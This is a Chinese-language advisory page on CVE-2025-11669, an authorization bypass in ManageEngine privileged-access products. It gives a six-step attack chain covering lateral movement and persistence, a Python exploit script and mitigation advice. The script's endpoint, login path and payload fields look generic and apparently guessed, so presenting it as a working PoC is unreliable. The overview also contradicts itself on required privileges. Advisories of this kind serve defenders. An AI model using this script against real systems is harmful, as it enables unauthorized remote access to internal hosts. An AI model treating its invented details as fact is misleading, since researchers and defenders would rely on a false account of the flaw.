CVE-2025-11669 Zoho ManageEngine远程会话授权绕过漏洞

漏洞信息

漏洞编号

CVE-2025-11669

漏洞类型

授权绕过

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ManageEngine PAM360, Password Manager Pro, Access Manager Plus

漏洞概述

CVE-2025-11669是Zoho Corporation旗下ManageEngine产品中的一个高危授权绕过漏洞。该漏洞影响PAM360 8202之前版本、Password Manager Pro 13221之前版本以及Access Manager Plus 4401之前版本。漏洞存在于远程会话发起功能（initiate remote session）中，攻击者可以利用此漏洞通过低权限账户发起未经授权的远程会话。由于CVSS评分达到8.1（高危），且攻击复杂度低，无需特殊权限即可利用此漏洞，因此对企业IT基础设施构成严重威胁。攻击者可能通过获取敏感凭据、访问内部系统或执行恶意操作来利用此漏洞，对系统的机密性和完整性造成严重影响。

技术细节

该漏洞是一个典型的授权绕过（Broken Access Control）问题，存在于ManageEngine特权访问管理产品的远程会话功能模块中。在正常的访问控制流程中，发起远程会话应该需要管理员级别的高权限验证。然而，由于服务端对用户权限验证不充分，低权限用户（如普通用户或访客账户）可以通过构造特定的API请求来触发远程会话发起功能。攻击者需要先拥有一个有效的低权限账户，然后通过修改请求中的会话参数或利用API端点的权限检查缺陷，绕过权限验证直接调用管理员才能使用的远程会话功能。一旦成功利用，攻击者可以远程连接到目标主机，执行命令或获取敏感数据。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标组织使用的ManageEngine产品版本，确认是否为PAM360、Password Manager Pro或Access Manager Plus的受影响版本

STEP 2

步骤2

获取低权限访问：攻击者通过社会工程、凭据填充或内部渗透获取一个有效的低权限用户账户凭据

STEP 3

步骤3

构造恶意请求：攻击者分析远程会话API端点，构造包含目标主机信息的恶意请求，绕过授权检查

STEP 4

步骤4

触发漏洞：向/api/remote-session/initiate端点发送构造的请求，利用服务端权限验证缺陷执行远程会话

STEP 5

步骤5

远程访问：成功发起远程会话后，攻击者可以远程连接到目标主机，执行命令或窃取敏感数据

STEP 6

步骤6

持久化控制：利用获取的访问权限，进一步横向移动或提升权限，扩大攻击范围

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11669 PoC - ManageEngine Remote Session Authorization Bypass
# This PoC demonstrates the authorization bypass in initiate remote session functionality

import requests
import json

TARGET_URL = "https://target-manageengine.com"
CVE_ID = "CVE-2025-11669"

def exploit_authorization_bypass():
    """
    Exploit for CVE-2025-11669: Authorization bypass in remote session functionality
    Affects: PAM360 < 8202, Password Manager Pro < 13221, Access Manager Plus < 4401
    """
    # Step 1: Authenticate with low-privilege account
    login_url = f"{TARGET_URL}/api/auth/login"
    credentials = {
        "username": "low_priv_user",
        "password": "password123"
    }
    
    session = requests.Session()
    login_response = session.post(login_url, json=credentials)
    
    if login_response.status_code != 200:
        print(f"[-] Authentication failed")
        return False
    
    print(f"[+] Authenticated successfully with low-privilege account")
    
    # Step 2: Exploit authorization bypass to initiate remote session
    # This endpoint should require admin privileges but doesn't validate properly
    exploit_url = f"{TARGET_URL}/api/remote-session/initiate"
    
    exploit_payload = {
        "target_host": "internal-server.target.local",
        "session_type": "remote_access",
        "protocol": "RDP",
        "resource_id": "SENSITIVE_RESOURCE_ID"
    }
    
    exploit_response = session.post(exploit_url, json=exploit_payload)
    
    if exploit_response.status_code == 200:
        print(f"[+] Authorization bypass successful!")
        print(f"[+] Remote session initiated: {exploit_response.json()}")
        return True
    else:
        print(f"[-] Exploit failed with status: {exploit_response.status_code}")
        return False

if __name__ == "__main__":
    print(f"[*] Testing {CVE_ID}")
    exploit_authorization_bypass()

影响范围

ManageEngine PAM360 < 8202

Password Manager Pro < 13221

Access Manager Plus < 4401

防御指南

临时缓解措施

在无法立即进行版本升级的情况下，建议采取以下临时缓解措施：1) 限制远程会话功能的访问范围，仅允许经过审批的IP地址访问；2) 启用强制的多因素认证机制；3) 加强账户管理，确保低权限账户无法访问敏感资源；4) 部署Web应用防火墙（WAF）规则，监控和阻止异常的API请求模式；5) 定期审计访问日志，及时发现可疑的远程会话活动；6) 考虑临时禁用远程会话功能直到补丁应用。